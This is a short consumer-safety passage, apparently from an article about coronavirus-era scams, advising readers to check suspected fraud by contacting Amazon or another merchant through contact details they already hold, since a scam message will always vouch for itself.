If you are worried about a fraudulent transaction, whether it’s via Amazon or any other coronavirus-friendly online merchant, log in to your account yourself, or call the company’s helpline yourself, using contact information you already have.

Never rely on information provided inside an email, or read out to you in a call, as a way of deciding whether to believe the email or the call.

After all, if the call or email is true, the reply you will receive will be truthful and will say, “It’s true.”

But if the call or email is false, the reply you will receive will be a lie, and will also say, “It’s true”!
